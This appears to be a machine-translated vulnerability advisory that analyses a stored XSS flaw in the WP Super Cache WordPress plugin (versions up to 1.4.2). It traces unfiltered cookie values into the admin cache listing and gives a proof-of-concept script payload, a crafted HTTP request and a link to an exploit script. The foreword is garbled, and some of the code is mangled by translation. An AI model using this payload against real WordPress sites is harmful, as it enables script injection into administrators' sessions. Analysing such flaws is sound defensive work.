WP Super Cache <=1.4.2 stored XSS vulnerability analysis-vulnerability warning-the black bar safety net

2015-04-15T00:00:00
ID MYHACK58:62201561219
Type myhack58
Reporter 佚名
Modified 2015-04-15T00:00:00

Description

Foreword

Just not expectations, HEE HEE busy busy, North-South without a home, steps from Recalling the beginning of the Arcana, coincided with the addict for heat mapping it.

Then he moment, like at this very moment, beloved more than the autumn wood, the trees and grass love return home, remember that the steps don't yesterday it!

!

Basic information

WP Super Cache will not cache the file is static,write the html file to wp-contents/cache directory. For wordpress users(anonymous comment,author,administrator, etc.) to generate a key,wherein the key portion is taken from the access to the current page the user cookie,according to the key to find the corresponding cache file. Plug-in background page display will list all cached files and key,since the key is not filtered,cause the plug-in background there is a storagexssvulnerabilities.

Trigger address:

http://127.0.0.1/cms/wordpress/wp-admin/options-general.php?page=wpsupercache&tab=contents&listfiles=1&_wpnonce=b468360c30#FTP

Trigger screenshots:

!

Code analysis

The plugin will hook all the pages call a function wp_super_cache_init to initialize the plug-in.

file: wp-super-cache.1.4.2\wp-cache-phase1.php line:1 0 7

function wp_super_cache_init() { .......

get_wp_cache_key()

}

get_wp_cache_key() call wp_cache_get_cookies_values

file :wp-super-cache.1.4.2\wp-cache-phase1.php line:3 6 0

function wp_cache_get_cookies_values() { $string = "; $regex = "/^wp-postpass|^comment_author_"; //Desk reviews,without registration. if ( defined( 'LOGGED_IN_COOKIE' ) ) $regex .= "|^" . preg_quote( constant( 'LOGGED_IN_COOKIE' ) ); else $regex .= "|^wordpress_logged_in_"; //login user $regex .= "/"; while ($key = key($_COOKIE)) { if ( preg_match( $regex, $key ) ) { if ( isset( $GLOBALS[ 'wp_super_cache_debug' ] ) && $GLOBALS[ 'wp_super_cache_debug' ] ) wp_cache_debug( "wp_cache_get_cookies_values: $regex the Cookie detected: $key", 5 ); $string .= $_COOKIE[ $key ] . ","; //Directly remove a cookie without filtering } next($_COOKIE); } reset($_COOKIE); // If you use this hook, make sure you update your . htaccess rules with the same conditions $string = do_cacheaction( 'wp_cache_get_cookies_values', $string ); return $string;

}

Check whether the cache and the cookies and other information is written into the wp-content\cache\meta-directory

As file:wp-cache-94bbb0fe53ee08e617bce3f2d58f264f. meta

a:5:{s:7:"headers";a:4:{s:4:"Vary";s:1 2:"Vary: Cookie";s:1 2:"Content-Type";s:3 8:"Content-Type: text/html; charset=UTF-8";s:1 0:"X-Pingback";s:5 3:"X-Pingback: http://127.0.0.1/cms/wordpress/xmlrpc.php";s:1 3:"Last-Modified";s:4 4:"Last-Modified: Mon, 1 0 Apr 2 0 1 5 0 6:0 8:4 5 GMT"; }s:3:"uri";s:2 4:"127.0.0.1/cms/wordpress/";s:7:"blog_id";i:1;s:4:"post";i:0;s:3:"key";s:7 8:"127.0.0.180/cms/wordpress/<script>alert(0)</script>,x@baidu.com,http://2222,";}

The background shows a page of the WP Super Cache settings > content ,the key code.

file:wp-super-cache.1.4.2\wp-cache.php line:2 3 4 7

ksort( $cached_list ); //cache the file list,from the wp-contents/cache folder read. foreach( $cached_list as $age => $d ) { foreach( $d as $details ) { echo "<tr $bg><td>$c</td><td> <a href='http://{$details[ 'uri' ]}'>" . $details[ 'uri' ] . "</a></td><td> " . str_replace( $details[ 'uri' ], ", $details[ 'key' ] ) . "</td><td> {$age}</td><td><a href='" . wp_nonce_url( add_query_arg( array( 'page' => 'wpsupercache', 'action' => 'deletewpcache', 'uri' => base64_encode( $details[ 'uri' ] ) ) ), 'wp-cache' ) . "#listfiles'>X</a></td></tr>\n"; $flip = !$ flip; $c++; } }

The variable $details[ 'key' ] from the wp-content\cache\meta-file,direct output,without any filtering.

Exploit

From the above analysis shows. Send the following data packet to generate a new cache,insert malicious script.

GET /cms/wordpress/ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/2 0 1 0 0 1 0 1 For Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: EN-us,EN;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: comment_author_url_{randstr}={poc}{randstr} Connection: keep-alive

Simple exploit: https://github.com/yaseng/pentest/blob/master/exploit/wp-super-cache-xss-exploit.py